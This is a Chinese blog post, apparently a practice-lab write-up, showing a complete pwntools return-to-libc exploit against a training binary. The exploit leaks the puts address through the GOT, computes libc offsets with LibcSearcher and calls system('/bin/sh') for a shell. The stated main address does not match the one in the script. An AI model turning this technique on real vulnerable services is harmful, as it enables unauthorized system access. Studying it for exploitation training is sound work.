实验三——ret2libc3地址泄露

我们完成了ret2libc1,ret2libc2两个实验,对getshell有了初步的了解,现在进行无system及/bin/sh函数的情况下获取权限,进行getshell。

调用IDA,查看主函数地址
在这里插入图片描述
得到主函数地址为0x080484FD

用【checksec】查看:不存在必要的保护
checksec

查看got表信息:【readelf -r ret2libc3】
在这里插入图片描述

写下脚本、运行脚本。

这里插入代码

from pwn import *
from LibcSearcher import *

context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']

p=process('./ret2libc3')
elf=ELF('./ret2libc3')
main=0x08048618
payload='a'*(0x6c+4)+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])

p.recvuntil('?')

p.sendline(payload)

puts=u32(p.recv(4))
print('puts',hex(puts))
libc =LibcSearcher('puts',puts)
libcbase=puts-libc.dump('puts')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
print('system',hex(system))
print('binsh',hex(bin_sh))
payload='a'*(0x64+4)+p32(system)+p32(0xdeadbeef)+p32(bin_sh)

p.sendline(payload)
p.interactive()

在这里插入图片描述
getshell

相关推荐
©️2020 CSDN 皮肤主题: 技术工厂 设计师:CSDN官方博客 返回首页